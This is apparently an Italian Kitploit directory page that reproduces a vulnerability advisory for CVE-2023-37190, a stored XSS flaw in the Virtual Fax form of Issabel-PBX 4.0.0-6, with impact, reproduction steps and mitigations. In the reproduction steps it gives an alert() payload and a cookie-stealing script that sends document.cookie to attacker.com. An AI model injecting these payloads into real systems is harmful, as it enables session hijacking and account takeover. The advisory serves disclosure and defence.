Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-37190 — Una vulnerabilità di Cross-Site Scripting (XSS) memorizzato è presente in Issabel-PBX versione 4.0.0-6. L'applicazione non sanifica e codifica correttamente l'input fornito dall'utente prima di memorizzarlo nel database e di successivamente renderizzarlo nell'interfaccia web. | Kitploit
Strumenti/GitHubGitHub/sahiloj/cve-2023-37190
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPaper e RicercaApprendimento e Formazione
GitHubsahiloj/cve-2023-37190

CVE-2023-37190

Una vulnerabilità di Cross-Site Scripting (XSS) memorizzato è presente in Issabel-PBX versione 4.0.0-6. L'applicazione non sanifica e codifica correttamente l'input fornito dall'utente prima di memorizzarlo nel database e di successivamente renderizzarlo nell'interfaccia web.

Vedi Repository
116 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-37190 — Issabel-PBX 4.0.0-6: Cross-Site Scripting (XSS) persistente

CVE Severity Type Affected Version


📋 Panoramica

CampoDettagli
ID CVECVE-2023-37190
VulnerabilitàCross-Site Scripting (XSS) persistente
Prodotto interessatoIssabel-PBX
Versione interessata4.0.0-6
GravitàMedia (punteggio CVSS v3.1: 5.4)
Scoperto daSahil Ojha
Data di divulgazione07 luglio 2023
FornitoreIssabel
Codice sorgenteIssabelFoundation/issabelPBX
Testato suWindows

📝 Descrizione

Una vulnerabilità di Cross-Site Scripting (XSS) persistente è presente in Issabel-PBX versione 4.0.0-6. L'applicazione non riesce a sanificare e codificare correttamente l'input fornito dall'utente prima di salvarlo nel database e successivamente renderizzarlo nell'interfaccia web.

La vulnerabilità è presente nel modulo Virtual Fax, in particolare nel modulo di creazione "New Virtual Fax". Due parametri di input — Virtual Fax Name e Caller ID Name — non sono sottoposti a una convalida dell'input o a una codifica dell'output adeguate. Ciò consente a un attaccante autenticato con privilegi bassi di iniettare e memorizzare permanentemente un payload JavaScript dannoso all'interno dell'applicazione.

Una volta memorizzato, lo script dannoso viene eseguito automaticamente nel browser di qualsiasi utente (inclusi gli amministratori) che visita la pagina interessata, senza richiedere alcuna interazione aggiuntiva da parte dell'attaccante.


⚠️ Impatto

Un attaccante che sfrutta con successo questa vulnerabilità può:

  • Rubare i cookie di sessione e dirottare le sessioni utente autenticate, inclusi gli account amministratore.
  • Eseguire azioni per conto delle vittime, come modificare configurazioni, aggiungere utenti o cambiare impostazioni di sistema.
  • Reindirizzare gli utenti verso pagine di phishing o distribuzione di malware controllate dall'attaccante.
  • Deturpare l'interfaccia dell'applicazione, compromettendo l'esperienza utente e la fiducia.
  • Distribuire malware o exploit del browser a tutti gli utenti che accedono alla pagina interessata.
  • Eseguire keylogging o catturare informazioni sensibili inserite nella pagina.

Poiché il payload è memorizzato (persistente), colpisce ogni utente che visita la pagina vulnerabile fino alla sua rimozione — rendendo questa vulnerabilità più grave di una XSS riflessa.


🔢 Punteggio CVSS v3.1


🔍 Dettagli della vulnerabilità

  • Tipo di vulnerabilità: Cross-Site Scripting persistente (CWE-79)
  • Componente interessato: modulo Virtual Fax → modulo New Virtual Fax
  • Parametri vulnerabili:
    • Virtual Fax Name
    • Caller ID Name
  • Autenticazione richiesta: Sì (utente autenticato con privilegi bassi)
  • Causa principale: mancata sanificazione dell'input e codifica dell'output sui parametri interessati prima del salvataggio nel database e della renderizzazione nell'interfaccia web.

🛠️ Passaggi per la riproduzione

Prerequisiti

  • Un'istanza in esecuzione di Issabel-PBX versione 4.0.0-6.
  • Credenziali valide per un account con accesso al modulo Fax (utente standard o amministratore).

Passaggi di riproduzione

Passaggio 1: Accedi all'applicazione web Issabel-PBX utilizzando credenziali valide.

Passaggio 2: Vai a Fax → Virtual Fax → New Virtual Fax.

Inietta il seguente payload XSS nei campi Virtual Fax Name e/o Caller ID Name:

root@kitploit:~
<script>alert('XSS-CVE-2023-37190')</script>

Per una proof-of-concept più efficace che dimostri il furto dei cookie di sessione (nota: negli attacchi reali, si utilizza HTTPS per evitare di esporre i cookie rubati in transito):

root@kitploit:~
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>

Il modulo compilato con il payload iniettato dovrebbe apparire simile alla schermata seguente:

Passaggio 2 - Iniezione del payload XSS nei campi Virtual Fax Name e Caller ID Name

Passaggio 3: Fare clic sul pulsante Save per inviare il modulo. Il payload viene ora memorizzato in modo persistente nel database dell'applicazione.

Passaggio 4: Vai alla pagina di elenco di Virtual Fax (oppure fai in modo che un altro utente — come un amministratore — visiti la pagina). Lo script memorizzato verrà eseguito automaticamente nel browser del visitatore, come mostrato di seguito:

Passaggio 4 - Esecuzione del payload XSS persistente nel browser


🩹 Mitigazione e rimedio

Agli utenti e agli amministratori di Issabel-PBX si consiglia vivamente di applicare le seguenti misure:

  1. Convalida dell'input: applicare una convalida rigorosa lato server su tutti gli input forniti dall'utente. Rifiutare o sanificare gli input che contengono caratteri HTML speciali (<, >, ", ', &).
  2. Codifica dell'output: applicare una codifica dell'output sensibile al contesto (codifica delle entità HTML) quando si renderizzano dati forniti dall'utente nell'interfaccia web per impedire l'esecuzione di script.
  3. Content Security Policy (CSP): implementare un'intestazione HTTP Content-Security-Policy rigorosa per limitare le fonti da cui gli script possono essere eseguiti, riducendo l'impatto delle vulnerabilità XSS.
  4. Aggiornamento / Patch: monitorare il repository ufficiale di Issabel e applicare tutte le patch di sicurezza rilasciate dal fornitore.
  5. Privilegio minimo: limitare l'accesso ai moduli sensibili come Virtual Fax ai soli utenti che ne hanno bisogno, riducendo la superficie di attacco.

📚 Riferimenti

  • NVD - CVE-2023-37190
  • Voce CVE di MITRE
  • Sito web ufficiale di Issabel
  • IssabelFoundation/issabelPBX su GitHub
  • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
  • OWASP: Cross-Site Scripting (XSS)

👤 Autore

Sahil Ojha
Ricercatore di sicurezza
GitHub: @sahiloj


Disclaimer: Questo repository è destinato esclusivamente a scopi educativi e di divulgazione responsabile. Le informazioni qui fornite non devono essere utilizzate per attaccare sistemi senza un'esplicita autorizzazione scritta del proprietario del sistema. L'autore non è responsabile per qualsiasi uso improprio di queste informazioni.

Scarica lo strumento
MetricaValore
Punteggio base5.4 (Media)
Vettore di attaccoRete
Complessità di attaccoBassa
Privilegi richiestiBassi
Interazione con l'utenteRichiesta
AmbitoModificato
RiservatezzaBassa
IntegritàBassa
DisponibilitàNessuno